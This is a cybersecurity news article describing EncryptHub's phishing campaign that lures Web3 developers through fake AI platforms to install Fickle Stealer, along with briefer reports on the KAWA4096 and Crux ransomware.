EncryptHub Targets Web3 Developers with Information Stealer Malware
Overview of the Threat Actor
A financially motivated group known as EncryptHub—also referred to as LARVA-208 or Water Gamayun—has launched a new campaign specifically aimed at compromising Web3 developers through information-stealer malware. This shift in focus represents a significant evolution in their tactics, as highlighted by Swiss cybersecurity firm PRODAFT.
Tactics and Techniques
EncryptHub’s recent operations involve deceptive practices centered around fake artificial intelligence platforms. Notable examples include Norlax AI, which mimics legitimate services like Teampilot. The group employs these platforms to entice developers with offers for job opportunities and requests to review portfolios.
Historically recognized for ransomware deployment, EncryptHub is diversifying its revenue streams by utilizing information-stealing malware to target cryptocurrency wallets and sensitive development data. This strategy reflects a broader shift in criminal tactics that prioritize data theft from high-value individuals and organizations within the cryptocurrency sphere.
Targeting Web3 Developers
The rationale behind EncryptHub’s focus on Web3 developers is evident. These professionals typically manage crypto wallets and have access to smart contract repositories or sensitive test environments. Many operate independently or across multiple decentralized projects, which complicates traditional security measures. This decentralized nature makes them particularly vulnerable to targeted attacks.
Developers involved in the Web3 and blockchain space are increasingly receiving phishing messages that direct them to fake AI platforms. These links are often disguised under the pretext of job interviews or portfolio assessments, creating initial trust to facilitate exploitation.
Phishing Methods Used
The attacker’s strategy involves sending misleading meeting links via popular platforms like X and Telegram. The pretense of a job discussion or portfolio critique enhances the likelihood that developers will click these links. Interestingly, when attackers circumvent security warnings from job boards like Remote3, they leverage initial conversations on platforms such as Google Meet before trying to transition to their fraudulent service, Norlax AI.
Once the victim engages with the fake platform, they are prompted to enter their email address and an invitation code. Following this, they typically encounter a fabricated error message about audio drivers, which serves as a vehicle for malware deployment.
Malware Deployment
Clicking on the erroneous message leads developers to download malicious software disguised as a genuine Realtek HD Audio Driver. This software executes PowerShell commands designed to retrieve and deploy Fickle Stealer, a malware variant specifically crafted to capture sensitive information. Once infected, the stealer malware sends gathered data to an external server dubbed SilentPrism.
According to PRODAFT, this operation marks a notable trend in the threat landscape, where attackers utilize fake AI applications to harvest critical data, including cryptographic credentials, which can later be exploited in illicit markets.
Evolving Cyber Threats
In a related development, a new ransomware variant named KAWA4096 has emerged, reflecting changes in the landscape of cybercriminal activities. It draws stylistic influences from known ransomware groups like Akira and Qilin, with a focus on enhancing visibility and notoriety.
KAWA4096, which surfaced in June 2025, has already targeted multiple companies, especially within the United States and Japan. It features a multithreaded architecture that efficiently encrypts files across shared network drives, streamlining the encryption process significantly.
Sophisticated Ransomware Techniques
KAWA4096’s operational efficiency is underscored by its ability to add valid files to a processing queue that is managed by worker threads. Security analysts Nathaniel Morales and John Basmayor have described how these threads work in unison to ensure effective processing and encryption, underscoring the sophistication of modern ransomware tactics.
In a separate development, another ransomware entity known as Crux has emerged. Claiming affiliation with the BlackByte group, Crux was detected in incidents throughout July 2025, primarily using legitimate Windows tools to engage in malicious activities.
Conclusion
The actions of EncryptHub and the emergence of new ransomware strains highlight the continual evolution of cyber threats, particularly against those in the cryptocurrency sector. Recognizing the signs of phishing and employing robust security measures is essential for safeguarding sensitive information in this increasingly targeted environment. Given the high stakes involved, continuous vigilance and proactive cybersecurity strategies remain paramount in defending against these sophisticated attacks.
